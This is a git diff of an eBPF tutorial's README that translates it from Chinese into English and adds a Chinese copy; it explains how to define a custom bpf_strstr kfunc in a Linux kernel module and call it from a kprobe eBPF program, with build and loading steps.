It's a game-changer for networking, security, and observability, enabling powerful functionalities without the need to modify kernel source code or load traditional kernel modules. -但尽管 eBPF 非常强大,它也并非没有局限性: +But as amazing as eBPF is, it isn't without its limitations: -- **功能差距:** 有时,eBPF 运行时的现有功能无法提供你所需的特定能力。 -- **复杂需求:** 某些任务需要更复杂的内核交互,而 eBPF 无法开箱即用地处理这些需求。 -- **性能问题:** 在某些情况下,eBPF 运行时的开销会引入延迟,或者在高性能需求下效率不够。 +- **Functionality Gaps:** Sometimes, the existing features of the eBPF runtime don't provide the specific capabilities you need. +- **Complex Requirements:** Certain tasks demand more intricate kernel interactions that eBPF can't handle out of the box. +- **Performance Issues:** In some cases, the overhead of the eBPF runtime introduces latency or isn't efficient enough for high-performance requirements. -这些挑战源于**整个 eBPF 运行时的限制**,而不仅仅是其辅助函数。那么,如何在不修改内核本身的情况下克服这些障碍呢? +These challenges stem from the limitations of the **entire eBPF runtime**, not just its helper functions. So how do you overcome these hurdles without altering the kernel itself? -引入**kfunc(BPF 内核函数)**。通过在内核模块中定义你自己的 kfunc,可以将 eBPF 的能力扩展到默认限制之外。这种方法让你能够: +Enter **kfuncs (BPF Kernel Functions)**. By defining your own kfuncs within kernel modules, you can extend eBPF's capabilities beyond its default limitations. This approach lets you: -- **增强功能:** 引入标准 eBPF 运行时中不可用的新操作。 -- **定制行为:** 根据你的特定需求定制内核交互。 -- **提升性能:** 通过在内核上下文中直接执行自定义代码,优化关键路径。 +- **Enhance Functionality:** Introduce new operations that aren't available in the standard eBPF runtime. +- **Customize Behavior:** Tailor kernel interactions to fit your specific needs. +- **Boost Performance:** Optimize critical paths by executing custom code directly in the kernel context. -**在本教程中,我们将特别添加一个 `strstr` kfunc。** 由于 eBPF 的验证器限制,直接在 eBPF 中实现字符串搜索是具有挑战性的,而将其定义为 kfunc 则允许我们安全高效地绕过这些限制,执行更复杂的操作。 +**In this tutorial, we'll specifically add a `strstr` kfunc.** While implementing a string search directly in eBPF is challenging due to verifier restrictions, defining it as a kfunc allows us to bypass these limitations and perform more complex operations safely and efficiently. -最棒的是,你可以在不修改核心内核的情况下实现这一目标,保持系统的稳定性和代码的安全性。 +Best of all, you achieve this without modifying the core kernel, keeping your system stable and your code safe. -在本教程中,我们将展示如何定义自定义 kfunc 以填补 eBPF 功能的任何空白。我们将逐步讲解如何创建一个引入新 kfunc 的内核模块,并演示如何在 eBPF 程序中使用它们。无论你是希望克服性能瓶颈,还是需要 eBPF 运行时未提供的功能,自定义 kfunc 都能为你的项目解锁新的可能性。 +In this tutorial, we'll show you how to define custom kfuncs to fill any gaps in eBPF's capabilities. We'll walk through creating a kernel module that introduces new kfuncs and demonstrate how to use them in your eBPF programs. Whether you're looking to overcome performance bottlenecks or need features the eBPF runtime doesn't offer, custom kfuncs can unlock new possibilities for your projects. -## 理解 kfunc:扩展 eBPF 超越辅助函数 +## Understanding kfunc: Extending eBPF Beyond Helpers -### 什么是 kfunc? +### What Are kfuncs? -**BPF 内核函数(kfuncs)** 是 Linux 内核中的专用函数,供 eBPF 程序使用。与标准的 eBPF 辅助函数不同,kfuncs 没有稳定的接口,并且在不同的内核版本之间可能有所变化。这种可变性意味着使用 kfuncs 的 BPF 程序需要与内核更新同步更新,以保持兼容性和稳定性。 +**BPF Kernel Functions (kfuncs)** are specialized functions within the Linux kernel that are exposed for use by eBPF programs. Unlike standard eBPF helpers, kfuncs do not have a stable interface and can vary between kernel releases. This variability means that BPF programs utilizing kfuncs need to be updated in tandem with kernel updates to maintain compatibility and stability. -### 为什么使用 kfuncs? +### Why Use kfuncs? -1. 
**扩展功能:** kfuncs 允许执行标准 eBPF 辅助函数无法完成的操作。 -2. **定制化:** 定义针对特定用例量身定制的逻辑,增强 eBPF 程序的灵活性。 -3. **安全与稳定:** 通过将 kfuncs 封装在内核模块中,避免直接修改核心内核,保持系统完整性。 +1. **Extended Functionality:** kfuncs enable operations that standard eBPF helpers cannot perform. +2. **Customization:** Define logic tailored to specific use cases, enhancing the flexibility of eBPF programs. +3. **Safety and Stability:** By encapsulating kfuncs within kernel modules, you avoid direct modifications to the core kernel, preserving system integrity. -### kfuncs 在 eBPF 中的角色 +### How kfuncs Fit into eBPF -kfuncs 作为 eBPF 程序与更深层次内核功能之间的桥梁。它们允许 eBPF 程序执行更复杂的操作,通过暴露现有内核函数或引入专为 eBPF 交互设计的新包装函数。这种集成在确保 eBPF 程序保持安全和可维护的同时,促进了更深入的内核交互。 +kfuncs serve as bridges between eBPF programs and deeper kernel functionalities. They allow eBPF programs to perform more intricate operations by either exposing existing kernel functions or introducing new wrappers specifically designed for eBPF interactions. This integration facilitates deeper kernel interactions while ensuring that eBPF programs remain safe and maintainable. -需要注意的是,Linux 内核已经包含了大量的 kfuncs。这些内置的 kfuncs 覆盖了广泛的功能,大多数开发者无需定义新的 kfuncs 就能完成任务。然而,在现有 kfuncs 无法满足特定需求的情况下,定义自定义 kfuncs 就变得必要。本教程将演示如何定义新的 kfuncs 以填补任何空白,确保你的 eBPF 程序能够利用你所需的确切功能。eBPF 也可以扩展到用户空间。在用户空间 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime) 中,我们也在实现 ufuncs,它们类似于 kfuncs,但扩展了用户空间应用程序。 +It's important to note that the Linux kernel already includes a plethora of kfuncs. These built-in kfuncs cover a wide range of functionalities, allowing most developers to accomplish their tasks without the need to define new ones. However, in cases where the existing kfuncs do not meet specific requirements, defining custom kfuncs becomes necessary. This tutorial demonstrates how to define new kfuncs to fill any gaps, ensuring that your eBPF programs can leverage the exact functionality you need. eBPF can also be extended to userspace. In the userspace eBPF runtime [bpftime](https://github.com/eunomia-bpf/bpftime), we are also implementing ufuncs, which are similar to kfuncs but extend userspace applications. -## kfuncs 及其演变概述 +## Overview of kfuncs and Their Evolution -要理解 kfuncs 的重要性,必须了解它们与 eBPF 辅助函数的演变关系。 +To appreciate the significance of kfuncs, it's essential to understand their evolution in relation to eBPF helper functions. -![累计辅助函数和 kfunc 时间线](https://raw.githubusercontent.com/eunomia-bpf/code-survey/main/imgs/cumulative_helper_kfunc_timeline.png) +![Cumulative Helper and kfunc Timeline](https://raw.githubusercontent.com/eunomia-bpf/code-survey/main/imgs/cumulative_helper_kfunc_timeline.png) -**关键要点:** +**Key Takeaways:** -- **辅助函数的稳定性:** eBPF 辅助函数保持了高度的稳定性,新增内容较少。 -- **kfuncs 的快速增长:** kfuncs 的采用和创建显著增加,表明社区有兴趣通过 kfuncs 扩展内核交互。 -- **向更深层次内核集成的转变:** 自 2023 年以来,新的用例主要利用 kfuncs 影响内核行为,显示出通过 kfuncs 实现更深层次内核集成的趋势。 +- **Stability of Helper Functions:** eBPF helper functions have remained largely stable, with minimal new additions. +- **Rapid Growth of kfuncs:** There's been a significant increase in the adoption and creation of kfuncs, indicating the community's interest in expanding kernel interactions via kfuncs. +- **Shift Towards Deeper Kernel Integrations:** Since 2023, new use cases predominantly leverage kfuncs to influence kernel behavior, signaling a trend towards more profound kernel integrations through eBPF. -这一趋势凸显了社区通过 kfuncs 更深入地与内核集成,推动 eBPF 能力边界的决心。 +This trend underscores the community's drive to push the boundaries of what eBPF can achieve by integrating more deeply with the kernel through kfuncs. 
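 
+Before defining your own kfunc, it helps to see what calling an already-existing one looks like from the eBPF side. The sketch below is illustrative and assumes a recent kernel that exposes the `bpf_task_from_pid` and `bpf_task_release` kfuncs to tracing programs: the program declares the kernel symbols with `__ksym`, and any pointer it acquires must be released before returning, or the verifier rejects the program.
+
+```c
+// Minimal sketch of calling built-in kfuncs (assumes vmlinux.h and a
+// kernel that exposes these task kfuncs to tracing programs).
+#include "vmlinux.h"
+#include <bpf/bpf_helpers.h>
+
+extern struct task_struct *bpf_task_from_pid(s32 pid) __ksym;
+extern void bpf_task_release(struct task_struct *p) __ksym;
+
+char LICENSE[] SEC("license") = "GPL";
+
+SEC("tp_btf/sched_process_exec")
+int check_init(u64 *ctx)
+{
+    struct task_struct *t = bpf_task_from_pid(1); // acquire a reference to PID 1
+    if (!t)
+        return 0;
+    bpf_printk("pid 1 comm: %s", t->comm);
+    bpf_task_release(t); // acquired pointers must be released
+    return 0;
+}
+```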
-## 定义你自己的 kfunc:分步指南
+## Defining Your Own kfunc: A Step-by-Step Guide
 
-为了利用 kfuncs 的强大功能,你需要在内核模块中定义它们。这个过程确保你的自定义函数能够安全地暴露给 eBPF 程序,而无需修改核心内核。
+To harness the power of kfuncs, you'll need to define them within a kernel module. This process ensures that your custom functions are safely exposed to eBPF programs without altering the core kernel.
 
-### 编写内核模块
+### Writing the Kernel Module
 
-让我们从创建一个简单的内核模块开始,该模块定义一个 `strstr` kfunc。这个 kfunc 将执行子字符串搜索操作,作为理解机制的基础。
+Let's start by creating a simple kernel module that defines a `strstr` kfunc. This kfunc will perform a substring search operation, serving as a foundation for understanding the mechanics.
 
-#### **文件:`hello.c`**
+#### **File: `hello.c`**
 
 ```c
-#include <linux/init.h>    // 模块初始化宏
-#include <linux/module.h>  // 加载模块的核心头文件
-#include <linux/kernel.h>  // 内核日志宏
+#include <linux/init.h>    // Macros for module initialization
+#include <linux/module.h>  // Core header for loading modules
+#include <linux/kernel.h>  // Kernel logging macros
 #include <linux/bpf.h>
 #include <linux/btf.h>
 #include <linux/btf_ids.h>
 
-/* 声明 kfunc 原型 */
+/* Declare the kfunc prototype */
 __bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz);
 
-/* 开始 kfunc 定义 */
+/* Begin kfunc definitions */
 __bpf_kfunc_start_defs();
 
-/* 定义 bpf_strstr kfunc */
+/* Define the bpf_strstr kfunc */
 __bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz)
 {
-    // 边界情况:如果 substr 为空,返回 0(假设空字符串在开始处找到)
+    // Edge case: if substr is empty, return 0 (assuming empty string is found at the start)
     if (substr__sz == 0)
     {
         return 0;
     }
-    // 边界情况:如果子字符串比主字符串长,则无法找到
+    // Edge case: if the substring is longer than the main string, it's impossible to find
     if (substr__sz > str__sz)
     {
-        return -1; // 返回 -1 表示未找到
+        return -1; // Return -1 to indicate not found
     }
-    // 遍历主字符串,考虑大小限制
+    // Iterate through the main string, considering the size limit
     for (size_t i = 0; i <= str__sz - substr__sz; i++)
     {
         size_t j = 0;
-        // 将子字符串与当前主字符串位置进行比较
+        // Compare the substring with the current position in the string
         while (j < substr__sz && str[i + j] == substr[j])
         {
             j++;
         }
-        // 如果整个子字符串都匹配
+        // If the entire substring was found
        if (j == substr__sz)
        {
-            return i; // 返回第一次匹配的索引
+            return i; // Return the index of the first match
        }
    }
-    // 如果未找到子字符串,返回 -1
+    // Return -1 if the substring is not found
    return -1;
 }
 
-/* 结束 kfunc 定义 */
+/* End kfunc definitions */
 __bpf_kfunc_end_defs();
 
-/* 定义 BTF kfuncs ID 集 */
+/* Define the BTF kfuncs ID set */
 BTF_KFUNCS_START(bpf_kfunc_example_ids_set)
 BTF_ID_FLAGS(func, bpf_strstr)
 BTF_KFUNCS_END(bpf_kfunc_example_ids_set)
 
-/* 注册 kfunc ID 集 */
+/* Register the kfunc ID set */
 static const struct btf_kfunc_id_set bpf_kfunc_example_set = {
     .owner = THIS_MODULE,
     .set = &bpf_kfunc_example_ids_set,
 };
 
-/* 模块加载时执行的函数 */
+/* Function executed when the module is loaded */
 static int __init hello_init(void)
 {
     int ret;
 
     printk(KERN_INFO "Hello, world!\n");
-    /* 注册 BPF_PROG_TYPE_KPROBE 的 BTF kfunc ID 集 */
+    /* Register the BTF kfunc ID set for BPF_PROG_TYPE_KPROBE */
     ret = register_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set);
     if (ret)
     {
-        pr_err("bpf_kfunc_example: 注册 BTF kfunc ID 集失败\n");
+        pr_err("bpf_kfunc_example: Failed to register BTF kfunc ID set\n");
         return ret;
     }
-    printk(KERN_INFO "bpf_kfunc_example: 模块加载成功\n");
-    return 0; // 成功返回 0
+    printk(KERN_INFO "bpf_kfunc_example: Module loaded successfully\n");
+    return 0; // Return 0 if successful
 }
 
-/* 模块卸载时执行的函数 */
+/* Function executed when the module is removed */
 static void __exit hello_exit(void)
 {
-    /* 取消注册 BTF kfunc ID 集 */
+    /* Unregister the BTF kfunc ID set */
unregister_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set); - printk(KERN_INFO "再见,世界!\n"); + printk(KERN_INFO "Goodbye, world!\n"); } -/* 定义模块的初始化和退出点的宏 */ +/* Macros to define the module’s init and exit points */ module_init(hello_init); module_exit(hello_exit); -MODULE_LICENSE("GPL"); // 许可证类型(GPL) -MODULE_AUTHOR("Your Name"); // 模块作者 -MODULE_DESCRIPTION("一个简单的模块"); // 模块描述 -MODULE_VERSION("1.0"); // 模块版本 +MODULE_LICENSE("GPL"); // License type (GPL) +MODULE_AUTHOR("Your Name"); // Module author +MODULE_DESCRIPTION("A simple module"); // Module description +MODULE_VERSION("1.0"); // Module version ``` -**代码解释:** +**Explanation of the Code:** -- **声明 kfunc:** `__bpf_kfunc` 宏声明一个 eBPF 程序可以调用的函数。在这里,`bpf_strstr` 执行给定字符串中的子字符串搜索。 +- **Declaring the kfunc:** The `__bpf_kfunc` macro declares a function that eBPF programs can invoke. Here, `bpf_strstr` performs a substring search within a given string. -- **BTF 定义:** `__bpf_kfunc_start_defs` 和 `__bpf_kfunc_end_defs` 宏标示 kfunc 定义的开始和结束。`BTF_KFUNCS_START` 及相关宏帮助将 kfuncs 注册到 BPF 类型格式(BTF)。 +- **BTF Definitions:** The `__bpf_kfunc_start_defs` and `__bpf_kfunc_end_defs` macros demarcate the beginning and end of kfunc definitions. The `BTF_KFUNCS_START` and related macros assist in registering the kfuncs with the BPF Type Format (BTF). -- **模块初始化:** `hello_init` 函数注册 kfunc ID 集,使 `bpf_strstr` 可用于 `BPF_PROG_TYPE_KPROBE` 类型的 eBPF 程序。 +- **Module Initialization:** The `hello_init` function registers the kfunc ID set, making `bpf_strstr` available to eBPF programs of type `BPF_PROG_TYPE_KPROBE`. -- **模块清理:** `hello_exit` 函数确保在模块移除时取消注册 kfunc ID 集,保持系统整洁。 +- **Module Cleanup:** The `hello_exit` function ensures that the kfunc ID set is unregistered upon module removal, maintaining system cleanliness. -#### **文件:`Makefile`** +#### **File: `Makefile`** ```makefile -obj-m += hello.o # hello.o 是目标 +obj-m += hello.o # hello.o is the target -# 启用 BTF 生成 +# Enable BTF generation KBUILD_CFLAGS += -g -O2 all: @@ -188,118 +188,118 @@ clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean ``` -**Makefile 解释:** +**Explanation of the Makefile:** -- **目标定义:** `obj-m += hello.o` 指定 `hello.o` 是要构建的模块。 +- **Target Definition:** `obj-m += hello.o` specifies that `hello.o` is the module to be built. -- **BTF 生成标志:** `KBUILD_CFLAGS += -g -O2` 启用调试信息和优化,便于 BTF 生成。 +- **BTF Generation Flags:** `KBUILD_CFLAGS += -g -O2` enables debug information and optimization, facilitating BTF generation. -- **构建命令:** - - **`all`:** 通过调用内核构建系统编译内核模块。 - - **`clean`:** 清理构建产物。 +- **Build Commands:** + - **`all`:** Compiles the kernel module by invoking the kernel build system. + - **`clean`:** Cleans up the build artifacts. -**注意:** 提供的代码在 Linux 内核版本 **6.11** 上进行了测试。如果你使用的是较早的版本,可能需要实现一些变通方法,例如引用 `compact.h`。 +**Note:** The provided code has been tested on Linux kernel version **6.11**. If you're using an earlier version, you might need to implement workarounds, such as referencing `compact.h`. -### 编译内核模块 +### Compiling the Kernel Module -在内核模块源代码和 Makefile 就位后,按照以下步骤编译模块: +With the kernel module source and Makefile in place, follow these steps to compile the module: -1. **导航到模块目录:** +1. **Navigate to the Module Directory:** ```bash cd /path/to/bpf-developer-tutorial/src/43-kfuncs/module/ ``` -2. **编译模块:** +2. **Compile the Module:** ```bash make ``` - 该命令将生成一个名为 `hello.ko` 的文件,即编译后的内核模块。 + This command will generate a file named `hello.ko`, which is the compiled kernel module. 
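+
+Optionally, before loading the module, you can sanity-check that `bpf_strstr` actually made it into the module's BTF. Assuming `bpftool` is installed, something like the following should show the function (the exact output format varies by bpftool version):
+
+```sh
+# the kfunc should appear as a FUNC entry in the module's BTF
+bpftool btf dump file hello.ko | grep bpf_strstr
+```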
-### 加载内核模块 +### Loading the Kernel Module -要将编译好的模块插入内核,使用 `insmod` 命令: +To insert the compiled module into the kernel, use the `insmod` command: ```bash sudo insmod hello.ko ``` -### 验证模块加载 +### Verifying Module Loading -加载模块后,通过检查内核日志验证其是否成功插入: +After loading the module, verify its successful insertion by checking the kernel logs: ```bash dmesg | tail ``` -**预期输出:** +**Expected Output:** ```txt [ 1234.5678] Hello, world! -[ 1234.5679] bpf_kfunc_example: 模块加载成功 +[ 1234.5679] bpf_kfunc_example: Module loaded successfully ``` -### 移除内核模块 +### Removing the Kernel Module -当不再需要该模块时,使用 `rmmod` 命令卸载它: +When you no longer need the module, unload it using the `rmmod` command: ```bash sudo rmmod hello ``` -**验证移除:** +**Verify Removal:** ```bash dmesg | tail ``` -**预期输出:** +**Expected Output:** ```txt -[ 1234.9876] 再见,世界! +[ 1234.9876] Goodbye, world! ``` -## 处理编译错误 +## Handling Compilation Errors -在编译过程中,可能会遇到以下错误: +During the compilation process, you might encounter the following error: ```txt Skipping BTF generation for /root/bpf-developer-tutorial/src/43-kfuncs/module/hello.ko due to unavailability of vmlinux ``` -**解决方案:** +**Solution:** -1. **安装 `dwarves` 包:** +1. **Install the `dwarves` Package:** - `dwarves` 包提供了生成 BTF 所需的工具。 + The `dwarves` package provides tools necessary for BTF generation. ```sh sudo apt install dwarves ``` -2. **复制 `vmlinux` 文件:** +2. **Copy the `vmlinux` File:** - 确保包含 BTF 信息的 `vmlinux` 文件在构建目录中可用。 + Ensure that the `vmlinux` file, which contains BTF information, is available in the build directory. ```sh sudo cp /sys/kernel/btf/vmlinux /usr/lib/modules/$(uname -r)/build/ ``` - 该命令将 `vmlinux` 文件复制到适当的构建目录,确保成功生成 BTF。 + This command copies the `vmlinux` file to the appropriate build directory, enabling successful BTF generation. -本教程的完整代码可在 [bpf-developer-tutorial 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/43-kfuncs) 的 GitHub 上找到。此代码在 Linux 内核版本 6.11 上进行了测试,对于较低版本,可能需要参考 `compact.h` 进行一些修改。 +The complete code for this tutorial can be found in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/43-kfuncs) on GitHub. This is tested on Linux kernel version 6.11, and some modifications may be required for lower versions, referring to `compact.h`. -## 在 eBPF 程序中使用自定义 kfunc +## Utilizing Your Custom kfunc in an eBPF Program -有了定义自定义 `strstr` kfunc 的内核模块后,下一步是创建一个利用此函数的 eBPF 程序。此交互展示了 kfuncs 引入的增强功能。 +With the kernel module defining your custom `strstr` kfunc in place, the next step is to create an eBPF program that leverages this function. This interaction showcases the enhanced capabilities introduced by kfuncs. -### 编写 eBPF 程序 +### Writing the eBPF Program -创建一个附加到 `do_unlinkat` 内核函数并使用自定义 `bpf_strstr` kfunc 的 eBPF 程序。 +Create an eBPF program that attaches to the `do_unlinkat` kernel function and uses the custom `bpf_strstr` kfunc. 
-#### **文件:`kfunc.c`** +#### **File: `kfunc.c`** ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -311,7 +311,7 @@ Skipping BTF generation for /root/bpf-developer-tutorial/src/43-kfuncs/module/he typedef unsigned int u32; typedef long long s64; -/* 声明外部 kfunc */ +/* Declare the external kfunc */ extern int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) __ksym; char LICENSE[] SEC("license") = "Dual BSD/GPL"; @@ -332,36 +332,36 @@ int handle_kprobe(struct pt_regs *ctx) } ``` -**eBPF 代码解释:** +**Explanation of the eBPF Code:** -- **外部 kfunc 声明:** `extern` 关键字声明 `bpf_strstr` 函数,使其在 eBPF 程序中可用。 - -- **Kprobe 附加:** `SEC("kprobe/do_unlinkat")` 宏将 eBPF 程序附加到 `do_unlinkat` 内核函数。每次调用 `do_unlinkat` 时,`handle_kprobe` 函数都会执行。 - -- **使用 kfunc:** 在 `handle_kprobe` 中,eBPF 程序调用 `bpf_strstr`,传入四个参数: - - `str`: 要搜索的主字符串。 - - `str__sz`: 主字符串的大小。 - - `substr`: 要搜索的子字符串。 - - `substr__sz`: 子字符串的大小。 +- **External kfunc Declaration:** The `extern` keyword declares the `bpf_strstr` function, making it accessible within the eBPF program. - 结果(子字符串在主字符串中的首次出现索引,或 -1 表示未找到)然后通过 `bpf_printk` 打印,显示 PID 和结果。 +- **Kprobe Attachment:** The `SEC("kprobe/do_unlinkat")` macro attaches the eBPF program to the `do_unlinkat` kernel function. Every time `do_unlinkat` is invoked, the `handle_kprobe` function executes. -**重要提示:** 由于验证器限制,直接在 eBPF 中实现类似 `strstr` 的函数具有挑战性,因为这限制了循环和复杂的内存访问。通过将 `strstr` 实现为 kfunc,我们绕过了这些限制,使得在 eBPF 程序中执行更复杂和高效的字符串操作成为可能。 +- **Using the kfunc:** Within `handle_kprobe`, the eBPF program calls `bpf_strstr` with four arguments: + - `str`: The main string to search within. + - `str__sz`: The size of the main string. + - `substr`: The substring to search for. + - `substr__sz`: The size of the substring. -### 编译 eBPF 程序 + The result, which is the index of the first occurrence of `substr` in `str` or `-1` if not found, is then printed using `bpf_printk`, displaying both the PID and the result. -要编译 eBPF 程序,确保你已安装必要的工具,如 `clang` 和 `llvm`。以下是编译程序的步骤: +**Important Note:** Implementing a `strstr`-like function directly in eBPF is challenging due to verifier restrictions that limit loops and complex memory accesses. By implementing `strstr` as a kfunc, we bypass these limitations, allowing for more complex and efficient string operations within eBPF programs. -1. **导航到 eBPF 程序目录:** +### Compiling the eBPF Program + +To compile the eBPF program, ensure you have the necessary tools installed, such as `clang` and `llvm`. Here's how you can compile the program: + +1. **Navigate to the eBPF Program Directory:** ```bash cd /path/to/bpf-developer-tutorial/src/43-kfuncs/ ``` -2. **为 eBPF 程序创建一个 `Makefile`:** +2. **Create a `Makefile` for the eBPF Program:** ```makefile - # 文件:Makefile + # File: Makefile CLANG ?= clang LLVM_STRIP ?= llvm-strip @@ -378,68 +378,68 @@ int handle_kprobe(struct pt_regs *ctx) rm -f kfunc.o ``` -3. **编译 eBPF 程序:** +3. **Compile the eBPF Program:** ```bash make ``` - 该命令将生成一个名为 `kfunc.o` 的文件,即编译后的 eBPF 对象文件。 + This command will generate a file named `kfunc.o`, which is the compiled eBPF object file. -### 运行 eBPF 程序 +### Running the eBPF Program -假设你有一个用户空间应用程序或工具来加载和附加 eBPF 程序,你可以执行它以观察 eBPF 程序与自定义 kfunc 之间的交互。 +Assuming you have a user-space application or a tool to load and attach the eBPF program, you can execute it to observe the interaction between the eBPF program and the custom kfunc. -**示例输出:** +**Sample Output:** ```bash # sudo ./load_kfunc -BPF 程序已加载并成功附加。按 Ctrl-C 退出。 +BPF program loaded and attached successfully. Press Ctrl-C to exit. 
``` -然后,当调用 `do_unlinkat` 函数时(例如,当文件被取消链接时),你可以检查内核日志: +Then, when the `do_unlinkat` function is invoked (e.g., when a file is unlinked), you can check the kernel logs: ```bash dmesg | tail ``` -**预期输出:** +**Expected Output:** ```txt [ 1234.5678] 'wor' found in 'Hello, world!' at index 7 [ 1234.5679] Hello, world! (pid: 2075) bpf_strstr 7 ``` -**输出解释:** +**Explanation of the Output:** -每次内核调用 `do_unlinkat` 函数时,eBPF 程序都会打印一条消息,指示进程的 PID 以及 kfunc 调用的结果。在此示例中,子字符串 `"wor"` 在字符串 `"Hello, world!"` 的索引 `7` 处被找到。 +Each time the `do_unlinkat` function is invoked in the kernel, the eBPF program prints a message indicating the PID of the process and the result of the kfunc call. In this example, the substring `"wor"` is found at index `7` in the string `"Hello, world!"`. -## 总结与结论 +## Summary and Conclusion -在本教程中,我们深入探讨了通过定义和使用自定义内核函数(kfuncs)来扩展 eBPF 的能力。以下是我们涵盖的内容回顾: +In this tutorial, we've delved deep into extending eBPF's capabilities by defining and utilizing custom kernel functions (kfuncs). Here's a recap of what we've covered: -- **理解 kfuncs:** 理解了 kfuncs 的概念及其在标准辅助函数之外增强 eBPF 的角色。 -- **定义 kfuncs:** 创建了一个内核模块,定义了自定义的 `strstr` kfunc,确保其能够安全地暴露给 eBPF 程序,而无需修改核心内核。 -- **编写包含 kfuncs 的 eBPF 程序:** 开发了一个利用自定义 kfunc 的 eBPF 程序,展示了增强的功能。 -- **编译与执行:** 提供了逐步指南,编译、加载并运行内核模块和 eBPF 程序,确保你可以在自己的系统上复制设置。 -- **错误处理:** 解决了潜在的编译问题,并提供了解决方案,确保顺利的开发体验。 +- **Understanding kfuncs:** Grasped the concept of kfuncs and their role in enhancing eBPF beyond standard helper functions. +- **Defining kfuncs:** Created a kernel module that defines a custom `strstr` kfunc, ensuring it can be safely exposed to eBPF programs without altering the core kernel. +- **Writing eBPF Programs with kfuncs:** Developed an eBPF program that leverages the custom kfunc to perform specific operations, demonstrating the enhanced functionality. +- **Compilation and Execution:** Provided a step-by-step guide to compile, load, and run both the kernel module and the eBPF program, ensuring you can replicate the setup on your own system. +- **Error Handling:** Addressed potential compilation issues and offered solutions to ensure a smooth development experience. -**关键要点:** +**Key Takeaways:** -- **克服辅助函数的限制:** kfuncs 弥合了标准 eBPF 辅助函数留下的空白,提供了针对特定需求的扩展功能。 -- **维护系统稳定性:** 通过将 kfuncs 封装在内核模块中,确保系统稳定性,而无需对内核进行侵入性更改。 -- **社区驱动的演变:** kfuncs 的快速增长和采用凸显了 eBPF 社区致力于通过 kfuncs 推动内核级编程可能性的决心。 -- **利用现有 kfuncs:** 在定义新的 kfuncs 之前,探索内核提供的现有 kfuncs。它们涵盖了广泛的功能,减少了除非绝对必要,否则无需创建自定义函数的需求。 +- **Overcoming Helper Limitations:** kfuncs bridge the gaps left by standard eBPF helpers, offering extended functionality tailored to specific needs. +- **Maintaining System Stability:** By encapsulating kfuncs within kernel modules, you ensure that system stability is maintained without making invasive changes to the kernel. +- **Community-Driven Evolution:** The rapid growth and adoption of kfuncs highlight the eBPF community's commitment to pushing the boundaries of what's possible with kernel-level programming. +- **Leveraging Existing kfuncs:** Before defining new kfuncs, explore the existing ones provided by the kernel. They cover a wide range of functionalities, reducing the need to create custom functions unless absolutely necessary. -**准备好进一步提升你的 eBPF 技能了吗?** [访问我们的教程仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial)并[探索我们网站上的更多教程](https://eunomia.dev/tutorials/)。深入丰富的示例,深化你的理解,并为 eBPF 的动态世界做出贡献! 
+**Ready to elevate your eBPF skills even further?** [Visit our tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) and [explore more tutorials on our website](https://eunomia.dev/tutorials/). Dive into a wealth of examples, deepen your understanding, and contribute to the dynamic world of eBPF! -祝你在 eBPF 的旅程中愉快! +Happy eBPF-ing! -## 参考资料 +## References -- [BPF 内核函数文档](https://docs.kernel.org/bpf/kfuncs.html) -- [eBPF kfuncs 指南](https://docs.ebpf.io/linux/kfuncs/) +- [BPF Kernel Functions Documentation](https://docs.kernel.org/bpf/kfuncs.html) +- [eBPF kfuncs Guide](https://docs.ebpf.io/linux/kfuncs/) -## 附加资源 +## Additional Resources -如果你想了解更多关于 eBPF 的知识和实践,可以访问我们的开源教程代码仓库 [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或访问我们的网站 [eunomia.dev/tutorials](https://eunomia.dev/tutorials/) 以获取更多示例和完整代码。 +If you'd like to learn more about eBPF knowledge and practices, you can visit our open-source tutorial code repository at [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [eunomia.dev/tutorials](https://eunomia.dev/tutorials/) for more examples and complete code. diff --git a/src/43-kfuncs/README.zh.md b/src/43-kfuncs/README.zh.md new file mode 100644 index 0000000..f80f394 --- /dev/null +++ b/src/43-kfuncs/README.zh.md @@ -0,0 +1,445 @@ +# 超越 eBPF 的极限:在内核模块中定义自定义 kfunc + +你是否曾经觉得 eBPF 的能力有限?也许你遇到了现有 eBPF 功能无法实现目标的情况。或许你需要与内核进行更深层次的交互,或者标准 eBPF 运行时无法解决的性能问题。如果你曾经希望在 eBPF 程序中拥有更多的灵活性和强大功能,那么本教程正适合你。 + +## 引言:添加 `strstr` kfunc 以突破 eBPF 运行时的限制 + +**eBPF(扩展伯克利包过滤器)** 通过允许开发者在内核中运行受沙箱限制的程序,彻底改变了 Linux 系统编程。它在网络、安全和可观测性方面具有革命性的作用,能够实现强大的功能,而无需修改内核源代码或加载传统的内核模块。 + +但尽管 eBPF 非常强大,它也并非没有局限性: + +- **功能差距:** 有时,eBPF 运行时的现有功能无法提供你所需的特定能力。 +- **复杂需求:** 某些任务需要更复杂的内核交互,而 eBPF 无法开箱即用地处理这些需求。 +- **性能问题:** 在某些情况下,eBPF 运行时的开销会引入延迟,或者在高性能需求下效率不够。 + +这些挑战源于**整个 eBPF 运行时的限制**,而不仅仅是其辅助函数。那么,如何在不修改内核本身的情况下克服这些障碍呢? + +引入**kfunc(BPF 内核函数)**。通过在内核模块中定义你自己的 kfunc,可以将 eBPF 的能力扩展到默认限制之外。这种方法让你能够: + +- **增强功能:** 引入标准 eBPF 运行时中不可用的新操作。 +- **定制行为:** 根据你的特定需求定制内核交互。 +- **提升性能:** 通过在内核上下文中直接执行自定义代码,优化关键路径。 + +**在本教程中,我们将特别添加一个 `strstr` kfunc。** 由于 eBPF 的验证器限制,直接在 eBPF 中实现字符串搜索是具有挑战性的,而将其定义为 kfunc 则允许我们安全高效地绕过这些限制,执行更复杂的操作。 + 